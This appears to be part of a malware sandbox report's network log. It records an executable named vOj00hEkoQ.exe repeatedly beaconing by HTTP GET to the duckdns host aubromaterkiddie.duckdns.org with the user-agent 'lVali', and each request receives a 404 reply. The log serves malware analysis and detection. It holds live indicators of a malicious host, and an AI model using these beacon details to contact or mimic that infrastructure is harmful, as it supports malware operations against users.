                2022-08-05 10:12:19 UTC60OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:19 UTC60INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:19 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:19 UTC60INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                144192.168.2.649942208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:19 UTC60OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:20 UTC61INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:20 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:20 UTC61INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                145192.168.2.649943208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:20 UTC61OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:20 UTC61INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:20 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:20 UTC61INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                146192.168.2.649944208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:20 UTC61OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:20 UTC61INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:20 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:20 UTC62INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                147192.168.2.649945208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:20 UTC62OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:20 UTC62INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:20 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:20 UTC62INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                148192.168.2.649946208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:20 UTC62OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:20 UTC62INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:20 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:20 UTC62INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                149192.168.2.649947208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:21 UTC63OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:21 UTC63INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:21 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:21 UTC63INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                15192.168.2.649779208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:46 UTC6OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:46 UTC6INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:46 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:46 UTC6INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                150192.168.2.649948208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:21 UTC63OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:21 UTC63INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:21 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:21 UTC63INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                151192.168.2.649949208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:21 UTC63OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:21 UTC63INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:21 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:21 UTC64INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                152192.168.2.649950208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:21 UTC64OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:21 UTC64INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:21 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:21 UTC64INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                153192.168.2.649951208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:22 UTC64OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:22 UTC64INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:22 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:22 UTC64INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                154192.168.2.649952208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:22 UTC65OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:22 UTC65INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:22 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:22 UTC65INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                155192.168.2.649953208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:22 UTC65OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:22 UTC65INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:22 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:22 UTC65INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                156192.168.2.649954208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:22 UTC65OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:22 UTC66INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:22 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:22 UTC66INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                157192.168.2.649955208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:23 UTC66OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:23 UTC66INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:23 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:23 UTC66INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                158192.168.2.649956208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:23 UTC66OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:23 UTC66INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:23 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:23 UTC67INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                159192.168.2.649957208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:23 UTC67OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:23 UTC67INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:23 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:23 UTC67INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                16192.168.2.649780208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:10:48 UTC6OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:10:48 UTC6INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:10:48 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:10:48 UTC7INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session IDSource IPSource PortDestination IPDestination PortProcess
                160192.168.2.649958208.67.105.81443C:\Users\user\Desktop\vOj00hEkoQ.exe
                TimestampkBytes transferredDirectionData
                2022-08-05 10:12:23 UTC67OUTGET /typmpustomsspyheeueheheupoawymopustysom/Grxxswfwhjfzuxjvaphlnsurmtnrajm HTTP/1.1
                User-Agent: lVali
                Host: aubromaterkiddie.duckdns.org
                2022-08-05 10:12:23 UTC67INHTTP/1.1 404 Not Found
                Server: nginx
                Date: Fri, 05 Aug 2022 10:12:23 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                2022-08-05 10:12:23 UTC67INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


